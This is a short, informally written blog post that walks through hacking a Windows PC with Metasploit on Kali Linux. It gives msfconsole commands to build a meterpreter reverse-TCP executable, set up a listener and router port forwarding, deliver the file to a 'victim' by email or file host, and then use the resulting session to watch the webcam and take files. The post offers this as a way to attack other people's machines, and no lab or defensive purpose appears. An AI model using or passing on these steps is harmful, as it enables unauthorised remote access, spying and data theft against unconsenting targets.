2016 latest trick to hack windows 7/8/10 or remote access. | villu prince

how  to hack windows latest trick by use kali 2




open terminal of your kali 2

type msfconsole


#msfconsole
#use windows/meterpreter/reverse_tcp
#show options


check which comand or which information should give proper


#set LHOST [ip gate from whoim.com or check ur public ip]
#generate -t exe -f file.exe
#ls


chack ur file location


send it to victim ( target pc)


how?? by uplad it on any file uploader like 4share.com or qfs.mobi ) ok ?? any problem comment me i will halpe you...



now what next??/


#back
#clear
#use exploit/multi/handler
#set PAYLOAD windows/meterpreter/reverse_tcp

now you should port forword type your gateway in browser 

it may 192.168.1.1 or 192.168.0.1

put user and pass of ur router it may 

username :admin
password: admin


go to prot forword table add port 4444
put ur private ip 
u can get it by type ifconfig in new terminal u get it it may like 192.168.1.103 or samething like

took your status tcp

add done



type your LHOST
#set LHOST [it may public or private]
set LPORT 4444

#show options 


check connection done or not




#exploit



transfer file.exe to target by email or file uplader


even target install that file you get session and target now online under ur attack

done :D

u get meterpreter> console ???? as u get conole type help

#help



use any comand to use target 



u can watch webcam transfer any file or manupulate target as u want to :;::::


ok ?/ 
:D


hmmm thanku 




prince villu here give me same reply :D